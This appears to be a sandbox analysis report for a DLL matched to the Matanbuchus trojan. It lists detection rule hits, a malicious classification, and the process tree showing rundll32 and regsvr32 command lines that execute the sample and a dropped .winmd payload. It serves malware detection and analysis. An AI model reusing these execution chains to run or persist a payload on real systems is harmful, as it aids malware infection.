                    Source: 5.2.rundll32.exe.7fa60000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                    Source: 00000009.00000002.2233819943.000000007F020000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                    Source: 00000009.00000002.2233819943.000000007F020000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                    Source: 0000000B.00000002.2258768567.000000007FC30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                    Source: 0000000B.00000002.2258768567.000000007FC30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                    Source: 0000000B.00000002.2258285565.000000000544F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                    Source: 0000000B.00000002.2258285565.000000000544F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                    Source: 0000001B.00000002.2807563546.0000000004ED7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                    Source: 0000001B.00000002.2807563546.0000000004ED7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                    Source: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                    Source: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                    Source: 00000003.00000002.2210553685.00000000051AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                    Source: 00000003.00000002.2210553685.00000000051AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                    Source: 0000001B.00000002.2808336693.000000007F7F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                    Source: 0000001B.00000002.2808336693.000000007F7F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                    Source: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                    Source: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                    Source: 00000005.00000002.3397711298.000000000507E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                    Source: 00000005.00000002.3397711298.000000000507E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                    Source: 00000009.00000002.2233332273.000000000508B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                    Source: 00000009.00000002.2233332273.000000000508B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                    Source: classification engineClassification label: mal100.troj.evad.winDLL@38/6@3/1
                    Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\8f08Jump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1132:120:WilError_03
                    Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\8f08
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4032
                    Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\44cea920-5f33-40ba-8521-a63064fc8bcb
                    Source: file.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Windows\SysWOW64\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,DllInstall
                    Source: file.dllVirustotal: Detection: 13%
                    Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\file.dll"
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\file.dll",#1
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,DllInstall
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",#1
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,Export
                    Source: unknownProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.winmd" "C:\Users\user\8f08\user-PC\user-PC.winmd"
                    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.winmd" "C:\Users\user\8f08\user-PC\user-PC.winmd"
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,Main
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",DllInstall
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",Export
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",Main
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_setopt
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_perform
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_init
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_cleanup
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",UnregisterDll
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 624
                    Source: unknownProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.winmd" "C:\Users\user\8f08\user-PC\user-PC.winmd"
                    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.winmd" "C:\Users\user\8f08\user-PC\user-PC.winmd"
                    Source: unknownProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.winmd" "C:\Users\user\8f08\user-PC\user-PC.winmd"
                    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.winmd" "C:\Users\user\8f08\user-PC\user-PC.winmd"
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\file.dll",#1Jump to behavior
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,DllInstallJump to behavior
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,ExportJump to behavior
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,MainJump to behavior
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",DllInstallJump to behavior
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",ExportJump to behavior
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",MainJump to behavior
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_setoptJump to behavior
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_performJump to behavior
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_initJump to behavior
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_cleanupJump to behavior
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",UnregisterDllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",#1Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.winmd" "C:\Users\user\8f08\user-PC\user-PC.winmd"Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.winmd" "C:\Users\user\8f08\user-PC\user-PC.winmd"
                    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.winmd" "C:\Users\user\8f08\user-PC\user-PC.winmd"
                    Source: C:\Windows\System32\loaddll32.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\System32\loaddll32.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\System32\regsvr32.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\System32\regsvr32.exeSection loaded: aclayers.dllJump to behavior
                    Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\System32\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: msi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\System32\regsvr32.exeSection loaded: apphelp.dll
                    Source: C:\Windows\System32\regsvr32.exeSection loaded: aclayers.dll
                    Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
                    Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc_os.dll
                    Source: C:\Windows\System32\regsvr32.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\regsvr32.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wininet.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: netapi32.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wkscli.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: msi.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: iertutil.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wldp.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: profapi.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: winhttp.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mswsock.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: winnsi.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: dpapi.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: msasn1.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: urlmon.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: srvcli.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: fwpuclnt.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: schannel.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mskeyprotect.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ntasn1.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ncryptsslp.dll
                    Source: C:\Windows\System32\regsvr32.exeSection loaded: apphelp.dll
                    Source: C:\Windows\System32\regsvr32.exeSection loaded: aclayers.dll
                    Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
                    Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc_os.dll
                    Source: C:\Windows\System32\regsvr32.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\regsvr32.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wininet.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: netapi32.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wkscli.dll
